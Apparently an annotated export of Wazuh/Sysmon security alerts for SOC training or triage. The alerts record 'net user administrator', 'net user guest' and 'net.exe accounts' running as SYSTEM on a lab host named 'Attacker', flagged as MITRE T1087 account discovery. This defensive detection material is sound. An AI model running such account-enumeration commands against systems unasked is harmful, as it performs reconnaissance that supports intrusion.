data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.711 ProcessGuid: {94294ddc-be63-680a-2e0c-000000000e00} ProcessId: 9352 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} ParentProcessId: 8956 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.711
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2e0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9352
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-2c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8956
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:52.118+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2312224
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.9493907Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291127
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.946 ProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} ProcessId: 13660 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.946
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13660
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:52.179+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.179+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2317475
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:44.0502982Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291130
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.044 ProcessGuid: {94294ddc-be64-680a-310c-000000000e00} ProcessId: 4256 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} ParentProcessId: 13660 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-310c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4256
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-2f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13660
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:52.199+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.199+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2322552
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:44.0939500Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291133
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.091 ProcessGuid: {94294ddc-be64-680a-320c-000000000e00} ProcessId: 10704 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.091
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-320c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10704
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:55.110+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:55.110+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534575.2327789
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:46.4773051Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291351
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

